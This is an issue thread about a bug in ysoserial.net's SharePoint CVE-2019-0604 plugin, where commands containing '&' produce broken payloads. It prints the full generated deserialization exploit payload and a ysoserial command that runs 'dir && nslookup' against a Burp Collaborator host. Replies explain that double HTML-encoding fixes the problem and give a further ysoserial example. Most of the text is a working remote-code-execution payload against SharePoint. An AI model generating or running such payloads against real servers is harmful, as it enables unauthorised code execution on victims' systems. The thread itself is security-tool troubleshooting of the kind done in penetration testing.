SharePoint CVE-2019-0604 plugin ampersand character (&) bug

Question

SharePoint CVE-2019-0604 plugin ampersand character (&) bug

opened this issue 4 years ago · comments

Hi,
When command contains & character, the ysoserial.net will generate broken payload.
I used the following command:

ysoserial --cve=CVE-2019-0604 --command="dir && nslookup xst82rx7czaogsnnk8tuq6gpzg56tv.burpcollaborator.net" -p SharePoint



__bp837135009700370047005600d600e2004400160047001600e20035005600270067009600360056003700e2009400e600470056002700e6001600c600e2005400870007001600e600460056004600750027001600070007005600270006002300b500b50035009700370047005600d600e20075009600e6004600f60077003700e200d40016002700b60057000700e20085001600d600c600250056001600460056002700c20005002700560037005600e6004700160047009600f600e600640027001600d60056007700f6002700b600c20065005600270037009600f600e600d3004300e2000300e2000300e2000300c20034005700c6004700570027005600d300e60056005700470027001600c600c200050057002600c60096003600b400560097004500f600b6005600e600d3003300130026006600330083005300630016004600330063004300560033005300d500c200b50035009700370047005600d600e20075009600e6004600f60077003700e2004400160047001600e200f4002600a600560036004700440016004700160005002700f60067009600460056002700c20005002700560037005600e6004700160047009600f600e600640027001600d60056007700f6002700b600c20065005600270037009600f600e600d3004300e2000300e2000300e2000300c20034005700c6004700570027005600d300e60056005700470027001600c600c200050057002600c60096003600b400560097004500f600b6005600e600d3003300130026006600330083005300630016004600330063004300560033005300d500d500c20035009700370047005600d600e2004400160047001600e20035005600270067009600360056003700c20065005600270037009600f600e600d3004300e2000300e2000300e2000300c20034005700c6004700570027005600d300e60056005700470027001600c600c200050057002600c60096003600b400560097004500f600b6005600e600d3002600730073001600530036005300630013009300330043005600030083009300a300c3005400870007001600e6004600560046007500270016000700070056002700f400660085001600d600c600250056001600460056002700f4002600a600560036004700440016004700160005002700f6006700960046005600270002008700d600c600e6003700a3001600d30022008600470047000700a300f200f200770077007700e20077003300e200f60027007600f2002300030003001300f2008500d400c4003500360086005600d6001600d2009600e600370047001600e60036005600220002008700d600c600e6003700a3002600d30022008600470047000700a300f200f200770077007700e20077003300e200f60027007600f2002300030003001300f2008500d400c4003500360086005600d60016002200e300c3005400870007001600e6004600560046005400c6005600d6005600e6004700f200e300c30005002700f600a6005600360047005600460005002700f600070056002700470097000300e300c300d400560047008600f6004600e4001600d6005600e30005001600270037005600c300f200d400560047008600f6004600e4001600d6005600e300c300d400560047008600f60046000500160027001600d60056004700560027003700e300c3001600e6009700450097000700560002001600a3004700970007005600d30022002600a3003700470027009600e60076002200e3006200c6004700b300250056003700f600570027003600560044009600360047009600f600e60016002700970002008700d600c600e6003700d300620017005700f6004700b3008600470047000700a300f200f2003700360086005600d60016003700e200d600960036002700f6003700f60066004700e2003600f600d600f20077009600e60066008700f2002300030003006300f20087001600d600c600f20007002700560037005600e6004700160047009600f600e600620017005700f6004700b30002008700d600c600e6003700a3008700d300620017005700f6004700b3008600470047000700a300f200f2003700360086005600d60016003700e200d600960036002700f6003700f60066004700e2003600f600d600f20077009600e60066008700f2002300030003006300f20087001600d600c600620017005700f6004700b30002008700d600c600e6003700a3003600d300620017005700f6004700b3003600c6002700d200e6001600d600560037000700160036005600a30035009700370047005600d600b3001600370037005600d6002600c6009700d300d60037003600f6002700c60096002600620017005700f6004700b30002008700d600c600e6003700a3004600d300620017005700f6004700b3003600c6002700d200e6001600d600560037000700160036005600a30035009700370047005600d600e2004400960016007600e600f60037004700960036003700b3001600370037005600d6002600c6009700d30037009700370047005600d600620017005700f6004700b300620076004700b30002006200c6004700b300f4002600a600560036004700440016004700160005002700f6006700960046005600270002008700a300b40056009700d300620017005700f6004700b300620017005700f6004700b3000200f4002600a6005600360047004500970007005600d300620017005700f6004700b300b7008700a300450097000700560002004600a30005002700f6003600560037003700d700620017005700f6004700b3000200d400560047008600f6004600e4001600d6005600d300620017005700f6004700b30035004700160027004700620017005700f6004700b300620076004700b30002006200c6004700b300f4002600a600560036004700440016004700160005002700f60067009600460056002700e200d400560047008600f60046000500160027001600d60056004700560027003700620076004700b30002006200c6004700b3003600a3003500470027009600e6007600620076004700b3003600d60046006200c6004700b300f2003600a3003500470027009600e6007600620076004700b30002006200c6004700b3003600a3003500470027009600e6007600620076004700b300f200360002004600960027000200620062000200e6003700c600f600f600b600570007000200870037004700830023002700870073003600a7001600f60076003700e600e600b6008300470057001700630076000700a70076005300630047006700e20026005700270007003600f600c600c60016002600f600270016004700f6002700e200e600560047006200c6004700b300f2003600a3003500470027009600e6007600620076004700b30002006200c6004700b300f200f4002600a600560036004700440016004700160005002700f60067009600460056002700e200d400560047008600f60046000500160027001600d60056004700560027003700620076004700b30002006200c6004700b300f200f4002600a600560036004700440016004700160005002700f60067009600460056002700620076004700b30002006200c6004700b300f200250056003700f600570027003600560044009600360047009600f600e600160027009700620076004700b300c300f2001600e60097004500970007005600e300c300f200d400560047008600f60046000500160027001600d60056004700560027003700e300c300f4002600a6005600360047009400e600370047001600e6003600560002001600a3004700970007005600d300220085001600d600c6002500560016004600560027002200e300c300f200f4002600a6005600360047009400e600370047001600e60036005600e300c300f20005002700f600a6005600360047005600460005002700f600070056002700470097000300e300c300f2005400870007001600e6004600560046007500270016000700070056002700f400660085001600d600c600250056001600460056002700f4002600a600560036004700440016004700160005002700f60067009600460056002700e300

The payload won't execute on a vulnerable SharePoint. However, if I try nslookup without the && the payload will execute.

Alvaro Muñoz · Answer 1 · Tue Jan 28 2020 23:27:36 GMT+0800 (China Standard Time)

Command is placed in XML, can you try using && instead?

Deleted user · Answer 2 · Wed Jan 29 2020 00:13:00 GMT+0800 (China Standard Time)

Yep I tried with the following:

^&
&
^&

It does not work.

Soroush Dalili · Answer 3 · Wed Jan 29 2020 06:55:57 GMT+0800 (China Standard Time)

We have the same issue in places that we have XML serializer. Input needs to HTML encoded twice. Example:

ysoserial.exe -g ObjectDataProvider -f XmlSerializer -c "notepad &amp;amp;&amp;amp; calc" -t

Soroush Dalili · Answer 4 · Wed Jan 29 2020 06:59:19 GMT+0800 (China Standard Time)

Similar to the XML issue, JSON messages can also have the same problem if we break their structure using our command.

A fix for this can be by applying HTML encoding (twice when it is already encoded) for XML messages and JSON escaping for JSON messages.

Deleted user · Answer 5 · Wed Jan 29 2020 15:17:51 GMT+0800 (China Standard Time)

We have the same issue in places that we have XML serializer. Input needs to HTML encoded twice. Example:
ysoserial.exe -g ObjectDataProvider -f XmlSerializer -c "notepad &amp;amp;&amp;amp; calc" -t 

Thanks @irsdl , it works with the &amp;&amp;.